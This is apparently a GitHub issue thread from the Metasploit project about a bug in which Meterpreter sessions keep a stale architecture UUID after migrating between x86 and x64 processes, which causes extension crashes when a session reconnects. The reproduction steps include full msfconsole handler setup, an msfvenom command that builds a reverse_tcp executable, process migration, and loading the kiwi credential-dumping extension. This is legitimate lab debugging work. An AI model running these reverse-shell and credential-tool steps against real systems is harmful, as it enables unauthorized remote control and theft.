Open OJ opened 7 years ago
Thanks @OJ! One last item:
1 Set up a reverse_* handler of some kind (I used to reverse_https) that's x86 and has ExitOnSession set to false. Kick it off with run -j.
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.17.24.1
LHOST => 172.17.24.1
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
2 Create a matching payload/binary.
14:56:52[justin@diablo ~/opt/metasploit-framework](r7_master)% ./msfvenom -p windows/meterpret
er/reverse_tcp LHOST=172.17.24.1 LPORT=4444 -f exe -o $MYDIR/m.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: /tmp/tmp.Z6yDC8gVUx/m.exe
3 Execute the payload/binary on an x64 system, get a session.
4 Check to make sure sysinfo says Meterpreter : x86/win32.
meterpreter > sysinfo
Computer : YUFFIE
OS : Windows 10 (Build 10586).
Architecture : x64 (Current Process is WOW64)
System Language : en_AU
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/win32
5 Run uuid to see the current UUID details
meterpreter > uuid
[+] UUID: 169e202616763839/x86=1/windows=1/2016-09-14T04:59:17Z
6 Migrate the session to an x64 process.
meterpreter > migrate 228
[*] Migrating from 2348 to 228...
[*] Migration completed successfully.
7 Run sysinfo again and notice it changes to Meterpreter : x64/win64.
meterpreter > sysinfo
Computer : YUFFIE
OS : Windows 10 (Build 10586).
Architecture : x64
System Language : en_AU
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/win64
8 Run uuid and notice that the architecture returned is still x86=1/windows=1 as it was before.
meterpreter > uuid
[+] UUID: 169e202616763839/x86=1/windows=1/2016-09-14T04:59:17Z
9 Put the session to sleep for 1 second using sleep 1.
10 Wait for the session to come back, and interact with it.
meterpreter > sleep 1
[*] Telling the target instance to sleep for 1 seconds ...
[+] Target instance has gone to sleep, terminating current session.
[*] 172.17.24.133 - Meterpreter session 1 closed. Reason: User exit
msf exploit(handler) >
[*] Sending stage (957999 bytes) to 172.17.24.133
[*] Meterpreter session 2 opened (172.17.24.1:4444 -> 172.17.24.133:1598) at 2016-09-14 15:00:
39 +1000
msf exploit(handler) > sessions -i 2
11 Run sysinfo again and notice that we now have Meterpreter : x86/win32 again.
meterpreter > sysinfo
Computer : YUFFIE
OS : Windows 10 (Build 10586).
Architecture : x64
System Language : en_AU
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/win32
12 Run uuid and we still have the same details.
meterpreter > uuid
[+] UUID: 169e202616763839/x86=1/windows=1/2016-09-14T04:59:17Z
If the user loads an extension at this point, they will see crashing happening as x86 binaries are thrown at x64 sessions.
meterpreter > use kiwi
Loading extension kiwi...
[-] Failed to load extension: No response was received to the core_loadlib request.
And notepad.exe
(the process I migrated to) crashes.
Thank you @justinsteven for the testing :)
@ccondon-r7 I'm thinking that this is no longer an issue, but we should test it nonetheless. There's a UUID sharing step that goes on (I believe) behind the scenes on session startup now so I think we're ok. But yeah, needs to be validated before we close it.
Once a Meterpreter session has been established back to MSF, it's possible to migrate from one process to another, as we know.
Unfortunately there's a small issue where during or after migration, no steps are taken to make sure that the new architecture of the session is tracked. Ideally, we should update the UUID of the session to match the new architecture, but we don't.
This doesn't prove to be an issue while using an established session that has been migrated from one arch to another, but it does cause issues when that session is put to sleep/split and then returns to MSF.
When MSF gets the session coming back, it believes it to be the same as the original architecture, even if it's no longer then case thanks to migrating. I'm not sure yet if this is just down to the fact that we don't update the UUID when migrating, or whether our handlers are not correctly checking the UUID in stageless connections once they've come back in. I think we should be doing both.
Steps to reproduce
reverse_*
handler of some kind (I used toreverse_https
) that's x86 and hasExitOnSession
set tofalse
. Kick it off withrun -j
.sysinfo
saysMeterpreter : x86/win32
.uuid
to see the current UUID detailssysinfo
again and notice it changes toMeterpreter : x64/win64
.uuid
and notice that the architecture returned is stillx86=1/windows=1
as it was before.sleep 1
.sysinfo
again and notice that we now haveMeterpreter : x86/win32
again.uuid
and we still have the same details.At this point we have mixed architecture things going on, which can result in bad things happening. If the user loads an extension at this point, they will see crashing happening as x86 binaries are thrown at x64 sessions.
Suggested approach
I think we should:
If in doubt, we should always ask Meterp instead of trying to keep track of it at the MSF side.
Ping @hdm and @busterb since we chatted on IRC about it.
Thanks!